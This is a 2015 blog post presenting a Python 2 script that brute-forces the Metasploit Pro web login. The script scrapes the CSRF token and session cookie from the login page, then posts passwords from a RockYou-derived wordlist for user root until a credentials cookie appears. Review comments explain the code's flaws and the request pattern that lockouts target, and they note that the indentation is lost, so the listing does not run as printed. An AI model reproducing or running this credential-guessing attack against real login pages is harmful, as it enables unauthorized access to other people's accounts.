Saturday, May 16, 2015

Old Python Script to Brute-Force Metasploit Pro Web Interface

I wrote this Python script to brute-force a login to Metasploit Pro. I doubt that it works against the current release, because I believe they added a login threshold: after 10 failed logins the account is locked.

#!/usr/bin/python
# Python 2 only: httplib, dict.has_key and the bare `print` statements below
# do not exist in Python 3.
#
# Per line of the wordlist the script does three things:
#   1. GET /login, write the body to getResponse.txt, then pull the
#      authenticity_token out of that body and the session cookie out of the
#      response headers.
#   2. POST /user_sessions with that token, that cookie and one candidate
#      password.
#   3. Treat a "user_credentials" cookie in the POST response as success.
#
# NOTE(review): the indentation of this listing was lost when the page was
# extracted, so the for/if bodies no longer parse as written.
#
# NOTE(review): the only exit condition is the user_credentials check at the
# bottom of the loop; a lockout response (the page notes newer releases lock
# the account after 10 failures) is not detected, the loop simply keeps going.
# On the server side this traffic is one GET /login plus one POST
# /user_sessions per candidate, all for the same username, which is the
# pattern a rate limit or lockout on /user_sessions is meant to catch.


import httplib


# Wordlist, one candidate per line; each line keeps its trailing newline.
fpasswords = open('modRockyou.txt')
for password in fpasswords:
# Scratch file: the GET response body is written here and re-read line by line.
f = open('getResponse.txt','w')


# A fresh TLS connection to the loopback Metasploit Pro UI port for every
# candidate. NOTE(review): no ssl context is passed, so whether the server
# certificate is validated depends on the Python 2.7 minor version (PEP 476
# changed the default in 2.7.9) — confirm for the interpreter in use.
conn = httplib.HTTPSConnection("127.0.0.1:3790")
conn.request("GET", "/login")
#conn.request("POST", "/user_sessions", postParam)
r1 = conn.getresponse()
f.write(r1.read())
f.close()


# Scan the saved body for the CSRF token the login form carries.
f = open('getResponse.txt')
for line in f:
if "authenticity_token" in line:
# Pulls the authenticity token out of the GET response body by fixed character
# offsets; any change in the surrounding markup (even one character) shifts the
# slice and yields a wrong token. If no line matches, auth_token is unbound
# and the POST below fails on a NameError.
auth_token = line[193:237]
#print "----"
#print line[193:237]
#print auth_token
#print " "
f.close()


# Only used by the commented-out debug print below.
header = r1.getheaders()
#print header


# Headers as a dict; has_key is Python 2 only.
header2 = dict(r1.getheaders())
if header2.has_key('set-cookie'):
#print header2['set-cookie']
#print " "
ui_session_raw = header2['set-cookie']
# Same fixed-length slicing as the token above: the cookie is cut at 234
# characters regardless of its actual length. If the GET response had no
# Set-Cookie header, ui_session is unbound when it is used below.
ui_session =  ui_session_raw[0:234]


# Now that I have the authenticity_token from the GET response and the ui_session cookie I can send the post back into the server


# Commented-out sample of the form body, with a literal token; not used.
#postParam = "utf8=%E2%9C%93&authenticity_token=hydDI8OCWE533edVJma3%2BJgVJUKOaqB1GNEL7XN9rq8%3D&user_session%5Busername%5D=root&user_session%5Bpassword%5D=mypassword&commit=Sign+in"

# Form body for the login POST: the Rails utf8 check-mark field, the token
# scraped above, username root and the candidate password with its newline
# stripped. The password is concatenated without URL-encoding, so candidates
# containing '&', '=' or '%' are sent malformed.
postParam = "utf8=%E2%9C%93&authenticity_token=" + auth_token + "&user_session%5Busername%5D=root&user_session%5Bpassword%5D=" + password.rstrip() + "&commit=Sign+in"


# Commented-out sample of a _ui_session cookie value; not used.
#_ui_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJThjZGZjMmMzNzRiMWUwOTQ2MjI3MmRjYzQyMWYwMWRjBjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVVVT2NJalRNZVlIS2tTQzhEc1R5U1kySHZUVHd1WWdOUVRaWlpnWmw3VW89BjsARkkiCmZsYXNoBjsARm86JUFjdGlvbkRpc3BhdGNoOjpGbGFzaDo6Rmxhc2hIYXNoCToKQHVzZWRvOghTZXQGOgpAaGFzaHsGOgplcnJvclQ6DEBjbG9zZWRGOg1AZmxhc2hlc3sGOwpJIiJJbnZhbGlkIHVzZXJuYW1lIG9yIHBhc3N3b3JkLgY7AEY6CUBub3cw--7ae6ffe189f3e025db7546e5e17552acc1e80201


# Replay the session cookie so the server pairs the POST with the session the
# token was issued for. No Content-Type header is sent with the form body.
headers = {"Cookie" : ui_session}


#print postParam
#print ' '
#print headers
#print ' '


conn.request("POST", "/user_sessions", postParam, headers)
r2 = conn.getresponse()
# Only used by the commented-out debug print below.
header3 = r2.getheaders()
#print header3
#print ' '
# Progress output: `password` still carries its newline here, so each
# candidate prints followed by a blank line.
print password
#print ' '
header4 = dict(r2.getheaders())


# Unlike the GET side there is no has_key check here: a POST response without
# a Set-Cookie header raises KeyError and ends the run.
user_cred_raw = header4['set-cookie']
# Success criterion: the server set a user_credentials cookie. The message
# embeds `password` unstripped, and exit(0) leaves fpasswords and conn open
# (the process ends anyway).
if "user_credentials" in user_cred_raw:
info = "Login was successful with password " + password
print info
exit(0)


# Per-candidate close (presumably inside the loop; the original indentation
# is lost).
conn.close()


# After the loop: closes the connection of the last iteration a second time.
conn.close()
fpasswords.close()

